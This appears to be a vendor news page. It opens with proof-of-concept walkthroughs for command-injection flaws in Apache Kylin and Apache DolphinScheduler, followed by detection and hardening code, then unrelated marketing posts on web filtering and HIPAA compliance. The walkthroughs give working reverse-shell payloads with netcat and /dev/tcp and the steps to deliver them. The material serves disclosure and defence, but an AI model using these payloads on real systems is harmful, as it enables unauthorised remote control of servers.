
CVE-2021-45456: Apache Kylin RCE PoC

Introduction

A command injection in #Apache Kylin has been found and registered as #CVE-2021-45456. At vsociety we managed to leverage it to RCE and create a PoC.

Analysis for this CVE is coming soon, so stay tuned to understand more in-depth about how this vulnerability works.

Proof of concept

  • Add a project

  • No special characters are allowed in a project name except _, so the project name is the payload with those characters stripped out, as follows:


    My payload is nc -c sh 172.17.0.1 9001, so the project name is nccsh17217019001




  • Go to “System”

  • Turn proxy on

  • Click “Diagnosis” and intercept the request


  • Send it to the repeater and drop this request

  • The payload after encoding %60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60


    The decoded payload

    `nc -c sh 172.17.0.1 9001`


  • Replace the project name with the encoded payload


  • Run the listener and send the request



NOTES

  1. Adding any /, encoded or not, to the payload will not work. Check the analysis on vsociety for more information.

  2. You need permission to create a project, so the name of the project can be based on the payload.

  3. The exploitation will not succeed if the project name is modified by adding any additional letter to the payload in the request.

  4. The IP and port must be part of the project name: the IP is written without the dots, and the dots are added later, URL-encoded, in the request.
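The PoC depends on a request whose project segment could never have passed the project-name rule, which gives defenders a simple log check. The sketch below is an added example, not code from the original post or from Apache Kylin: the `/example-diag/...` route and the log lines are constructed placeholders, and the allowlist of letters, digits and `_` is taken from the first PoC step.

```python
import re
from urllib.parse import unquote

# Hypothetical route for the "Diagnosis" request; the page does not give the
# real path, so replace this pattern with the one your deployment logs.
DIAG_ROUTE = re.compile(r"^/example-diag/project/(?P<project>[^/?]+)")
# The project form accepts only letters, digits and "_" (first PoC step).
NOT_ALLOWED = re.compile(r"[^A-Za-z0-9_]")
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded names are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return a finding for a diagnosis request whose project segment could
    never be a valid project name, else None."""
    req = REQUEST.search(line)
    route = DIAG_ROUTE.match(req.group("target")) if req else None
    if not route:
        return None
    project = decode_fully(route.group("project"))
    bad = sorted(set(NOT_ALLOWED.findall(project)))
    if not bad:
        return None
    return {
        "decoded": project,
        "illegal_chars": bad,
        # Name left after stripping: correlate with project-creation events.
        "stripped_name": NOT_ALLOWED.sub("", project),
    }


def scan(lines):
    """Collect findings for every suspicious line."""
    return [finding for finding in map(inspect_line, lines) if finding]


# Constructed access-log lines (not captured traffic).
SAMPLE_LOG = [
    '172.17.0.1 - admin [10/Jan/2022:10:00:01 +0000] '
    '"GET /example-diag/project/sales_2021/download HTTP/1.1" 200 5120',
    '172.17.0.1 - admin [10/Jan/2022:10:02:17 +0000] '
    '"GET /example-diag/project/'
    '%60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60/download HTTP/1.1" 500 0',
    '172.17.0.1 - admin [10/Jan/2022:10:03:40 +0000] '
    '"GET /example-static/app.js HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allowlist, applied server-side to the decoded project segment before it is used anywhere, is the corresponding input-validation control.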

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

CVE-2022-45875: Apache DolphinScheduler Remote Code Execution PoC

Introduction

Improper input validation leading to command injection/RCE in #Apache #DolphinScheduler has been found and registered as #CVE-2022-45875. We already published the analysis blog for this CVE, breaking down what’s going on behind the scenes; you can check it here: https://www.vicarius.io/vsociety/blog/cve-2022-45875-apache-dolphinscheduler-vulnerable-to-improper-input-validation-leads-to-rce

Remote Code Execution PoC

  • Supposing you already found an alarm you can edit or create a new one.
  • Add the following payload '; echo "sh -i >& /dev/tcp/172.17.0.1/9001 0>&1"|bash;# to the “User Params”
  • Run your listener
  • There are two ways to launch the exploit now
    • Go to “Projects>Click on the project name>Workflow Definition>Start”. This is already mentioned in the analysis blog.
    • Go to “Projects>Click on the project name>Workflow instance>Rerun”

NOTES

  1. Usually, when you access Apache DolphinScheduler you will find that tenants, alarms, projects, and workflows are already set up.
  2. You need to make sure that you have permission to edit the alarm so you can add your payload, and that you can at least run a workflow, so you can decide which alarm group will be used for notification. If you can run a workflow and choose the alarm group that includes the malicious one, you will be able to exploit it.
  3. You need a script that already exists on the server, so that when the alarm is triggered it triggers the payload as well; there are multiple checks, and one of them checks whether the script file exists. For more information about this, check the analysis blog.
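The payload's shape (closing quote, `;`, trailing `#`) suggests the parameters end up inside a single-quoted shell string. The following added example, which is not DolphinScheduler's code, contrasts that assumed pattern with two hardened forms, using `echo` as a stand-in for the alert script and a harmless constructed parameter.

```python
import shlex
import subprocess

# Stand-in for the alert script on the server (assumption: any executable
# that receives the alarm's "User Params" as an argument).
SCRIPT = "echo"

# Constructed, harmless parameter with the same shape as the PoC value:
# close the quote, start a second command, comment out the trailing quote.
BREAKOUT = "'; echo INJECTED;#"


def run_concatenated(user_params):
    """Before: parameters pasted between single quotes and handed to sh.
    This pattern is an assumption inferred from the payload's shape."""
    command = f"{SCRIPT} '{user_params}'"
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


def run_argv(user_params):
    """After: no shell at all; the parameters are exactly one argv element."""
    done = subprocess.run([SCRIPT, user_params], capture_output=True, text=True)
    return done.stdout.splitlines()


def run_quoted(user_params):
    """After, when a shell cannot be avoided: escape with shlex.quote."""
    command = f"{SCRIPT} {shlex.quote(user_params)}"
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


if __name__ == "__main__":
    # The concatenated form runs a second command; the other two only
    # pass the text through to the script as data.
    print("concatenated:", run_concatenated(BREAKOUT))
    print("argv list:   ", run_argv(BREAKOUT))
    print("shlex.quote: ", run_quoted(BREAKOUT))
```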


SafeDNS Course: The Basics of Web Filtering and SafeDNS Dashboard Settings

The internet plays a vital role in our daily lives, but its growth has led to online threats such as malicious websites, phishing scams, and malware that can harm your online security. Protecting your network from such threats is critical, and that’s where SafeDNS comes in.

To help you understand how to use SafeDNS and web filtering, we’re excited to introduce the SafeDNS course on the basics of web filtering and SafeDNS dashboard settings. This course is designed to teach you how to use the SafeDNS dashboard to configure web filtering settings and monitor network activity.

The course is divided into modules, each covering a specific topic related to web filtering and SafeDNS. Some of the topics covered include:
  • Introduction to web filtering
  • Creating allowlists and denylists
  • Setting up custom filtering rules
  • Monitoring network activity
  • SafeDNS dashboard settings and configuration
To complete the course, you’ll need to create a SafeDNS account. Once you’ve registered, you’ll have access to the SafeDNS dashboard and be able to follow along with the course material. The course is designed to be self-paced, and you can complete the modules at your own convenience.

Upon completion of the course, you’ll receive a certificate of attendance, which demonstrates your expertise in web filtering and SafeDNS dashboard settings. This certificate can be valuable for IT professionals who want to demonstrate their expertise to employers or clients.

Overall, the SafeDNS course on the basics of web filtering and SafeDNS dashboard settings is an essential resource for anyone who wants to maintain a secure online presence. Whether you’re a small business owner or an IT professional, the course will teach you the fundamentals of web filtering and how to use SafeDNS to protect your network from online threats. So, register today and start learning!


About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

DNS Filtering & DNS Firewall: Any Difference?

In the digital age, cybersecurity is a top concern for businesses and individuals alike. One of the most important aspects of online security is filtering unwanted content and preventing unauthorized access to networks. Two commonly used technologies for this purpose are firewalls and content filtering. However, there is often confusion around the terminology used to describe these technologies, particularly in relation to DNS filtering. In this article, we will explore the differences between firewalls, content filtering, and DNS filtering, and clarify the terminology used to describe each.


What is a Firewall?

A firewall is a security system designed to monitor and control incoming and outgoing network traffic based on predefined security rules. Firewalls can be implemented at different levels of the network, including the hardware level, operating system level, and application level. Firewalls can block unwanted traffic, detect and prevent unauthorized access, and protect against malware and other security threats.

What is Content Filtering?

Content filtering refers to the process of blocking or allowing access to certain types of content based on predefined criteria. Content filtering can be done at the network level or at the endpoint level, and can be based on a variety of factors, including keywords, categories, file types, and more. Content filtering is often used to block access to inappropriate or harmful websites, or to prevent employees from accessing non-work-related content during work hours.

What is DNS Filtering?

DNS filtering is a type of content filtering that is based on domain name system (DNS) queries. DNS filtering works by intercepting DNS queries and determining whether to allow or block the requested domain based on predefined criteria. DNS filtering can be used to block access to known malicious domains, prevent access to specific categories of content, and enforce company policies related to internet usage.

Why do DNS filters and DNS Firewalls get mixed up?

One reason for the confusion between DNS filtering and DNS firewall is that both technologies operate at the DNS level. However, while DNS filtering is a type of content filtering that focuses on blocking or allowing access to specific domains, DNS firewalling is a more comprehensive approach that involves blocking or allowing traffic based on a wide range of criteria, including IP addresses, ports, protocols, and more. In essence, DNS filtering is a subset of DNS firewalling, but the two terms are often used interchangeably, which can lead to confusion.

Are they the same or different, then?

While DNS filtering is often referred to as a DNS firewall, this is not entirely accurate. A DNS firewall is a security system that is designed to prevent attacks that exploit DNS vulnerabilities, such as DNS cache poisoning or DNS amplification attacks. DNS filtering, on the other hand, is a content filtering technology that is designed to block or allow access to specific domains based on predefined criteria. While both technologies operate at the DNS level, they have different purposes and should be referred to using the appropriate terminology.

It’s crucial for cybersecurity companies to have a clear understanding of what “DNS Firewall” really means and to ensure that they can deliver exactly what their clients expect from them, without any confusion or uncertainty. While this term is used in many definitions and contexts, it can sometimes be difficult to know exactly what you’re getting. That’s why it’s important to choose a cybersecurity provider that you can trust to provide the services they promise. At SafeDNS, we started out as a content filter, and we have built our reputation on being transparent and delivering exactly what we say we will. When you work with us, you can have confidence that you are getting the protection and security you need, without any guesswork or uncertainty. Choose SafeDNS and let us help you stay safe and secure online.

If you’re interested in protecting your network and employees from harmful content and malicious domains, sign up for a free trial of SafeDNS today.


HIPAA compliance for SaaS: a guide for healthcare providers

As healthcare providers increasingly rely on Software-as-a-Service (SaaS) applications to manage patient data, it is crucial for them to understand the importance of HIPAA compliance.

This article will discuss what healthcare organizations need to know about HIPAA compliance for SaaS and how to ensure that their SaaS applications follow industry-specific regulations.

What does HIPAA compliance mean for SaaS?

When it comes to HIPAA compliance, SaaS providers fall into two broad categories: developers and app providers on one side, and SaaS hosting services on the other. The two groups have different compliance needs, so it’s helpful to discuss them separately.

SaaS developers and providers

SaaS developers and providers that serve the healthcare sector must ensure their products are HIPAA compliant.

HIPAA compliance means that SaaS developers and service providers adhere to HIPAA’s Security, Privacy, and Breach Notification rules. The most important section here is the HIPAA Security Rule, which has three sub-sections: technical, administrative, and physical.

Under the HIPAA Security Rule, Covered Entities (CEs) and Business Associates (BAs) must put in place protective measures to secure Protected Health Information (PHI). SaaS companies tend to fall under the Business Associate header.

SaaS providers must sign Business Associate Agreements (BAAs) with clients. These agreements set out areas of responsibility and liability. Both healthcare companies and cloud providers should be clear about sharing compliance duties and protecting patient data.

SaaS hosting services

The situation is less clear for SaaS hosting services. The HIPAA Security Rule does not set clear guidelines for cloud computing companies hosting healthcare services. Yet, it has become increasingly important to brand cloud infrastructure as HIPAA-eligible.

HIPAA-eligible hosts offer products that clients can adapt to meet HIPAA standards. This reassures clients that shared cloud computing architecture is properly secured. The major cloud platforms offer HIPAA-eligible services, including Amazon Web Services, Microsoft Azure, and Google Cloud.

Important HIPAA compliance areas for companies and SaaS providers

Not all SaaS companies working in the healthcare sector need to worry about HIPAA compliance. For example, many health app developers won’t handle patient records if their involvement ends when the app is delivered to clients.

But this changes if DevOps teams maintain and update cloud apps for health companies. If you handle Protected Health Information or could access PHI during development tasks, you must be HIPAA compliant.

Generally speaking, HIPAA compliance is critical for providers of SaaS-based healthcare services such as monitoring apps, payment portals, or insurance management tools. And compliance is also a concern for services that host PHI on cloud infrastructure.

Specifically, healthcare organizations need to protect patient data:

  • When creating patient records

  • When information is received

  • When PHI is at rest on cloud resources

  • During transmission (if this involves SaaS infrastructure or apps).

HIPAA requirements for SaaS providers

What does the process of becoming HIPAA-compliant look like? Under the HIPAA Privacy rule, there are three main areas of focus.

Firstly, achieving SaaS data security involves creating robust technical controls. This could include encryption of data in transit and at rest. It also includes access controls to prevent unauthorized access to confidential data. Multi-factor authentication, firewall protection, and password management systems all contribute.

On the administrative side, SaaS companies must train workers to use SaaS tools safely. They must also have robust data handling policies and device usage rules to prevent the unsafe movement of patient data.

Finally, physical security measures include securing data centers via locks, authorization systems, and cameras. There should be measures to protect physical devices on and off-site and plans to guard data against natural disasters and sabotage.

Business Associate Agreements cover all three of these areas. The Covered Entity and Business Associate sign BAAs before commencing their business partnership.

The BAA describes the areas of responsibility of clients and SaaS providers. It includes details on how to achieve compliance. And it explains how partners will be liable when security breaches occur.

Sharing compliance responsibilities

Under the Privacy Rule, SaaS partners and Covered Entities have shared responsibility for protecting patient data.

Cloud Service Providers guard infrastructure and data at rest on their servers. Service users manage access control, data in transit, and how users interact with their apps. This situation applies in healthcare as well. But controls on data access are much tighter.

HIPAA-compliant SaaS hosts and providers must apply the strongest possible encryption to all confidential data. They are responsible for ensuring data is available when requested. Servers must also remain online when healthcare organizations need them.

SaaS hosts manage the physical safety of hosting infrastructure. SaaS providers handle the integrity of application code. They must guard against emerging threats like Zero Day Exploits and ensure healthcare apps are as secure as possible.

Healthcare organizations (Covered Entities) have different responsibilities. Healthcare organizations must train staff to use SaaS services safely. Every covered entity needs to educate users about safe remote access, using encryption, managing passwords, and avoiding phishing attacks.

Healthcare organizations also deal with access controls. They must ensure PHI is only available to authorized professionals or patients themselves.

Most cloud-based cyber attacks have their roots in unsafe user behavior or loose access controls. Provider-side security is critical. Yet, it’s also important for SaaS providers and hosts to tighten their HIPAA compliance.

Healthcare organizations and SaaS partners should know exactly how to share responsibility and take appropriate action to ensure watertight compliance.

Implementing HIPAA compliance measures

A robust HIPAA compliance plan ensures that SaaS companies follow HIPAA’s Security, Privacy, and Breach Notification rules. Dividing your compliance plan between the three HIPAA regulations is good practice.

Compliance plans cover many areas, and the exact make-up varies between organizations. But common elements include:

Risk management

Create risk management plans for all critical data protection risks. Risk assessment processes should include risk severity and actions required to mitigate each risk.

Project ownership

Appoint individuals with responsibility for HIPAA privacy and security management.

Security controls

This includes physical safeguards such as cameras and locks. Data protection controls are also crucial. Use encryption, access management, endpoint protection, and monitoring tools to track user activity.

Administrative safeguards

This could include training plans to educate workers and communicate HIPAA responsibilities.

Auditing

Regular compliance audits ensure controls function properly and that staff training achieves the desired results.

Systems to receive and act on HIPAA complaints

Create a secure email or phone line to report PHI violations. Organizations must make data available to patients and have streamlined processes to report data breaches to regulators.

Documentation

Create and store clear documentation outlining HIPAA compliance policies. Make documents available to staff members and regulators if needed.

Handling third parties and associates

HIPAA-compliant organizations must have solid procedures to onboard business associates. SaaS partners should be able to provide clear evidence of compliance and HIPAA eligibility (if needed).

Clients should immediately know that the SaaS provider is a dependable and secure partner. If you have not done so, plan to achieve recognized security standards such as NIST 800-53, ISO 27001, or ISO 20000-1.

How can NordLayer help?

Becoming HIPAA compliant can be challenging for SaaS developers and service providers. But if you want to thrive in the healthcare sector, a strong compliance plan is essential. NordLayer’s HIPAA-compliant solution can help you make the changes needed when building a reputation in SaaS health provision.

Our network security solutions include the following:

  • Streamlined network access controls to ensure only authorized users can access PHI.

  • Secure Remote Access from all endpoints ensures equally secure and protected network access for remote and hybrid work environments without putting health data at risk.

  • 256-bit AES encrypts data that is being sent between networks and reduces data breach risks.

  • Compatibility with major cloud platforms such as Azure and AWS. Integrate Secure Remote Access with cloud-native controls to create a solid HIPAA security setup.

All SaaS companies operating in the health sector need rock-solid data protection that complies with HIPAA regulations. Explore your options and ensure safe access to PHI with NordLayer’s assistance.


About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.
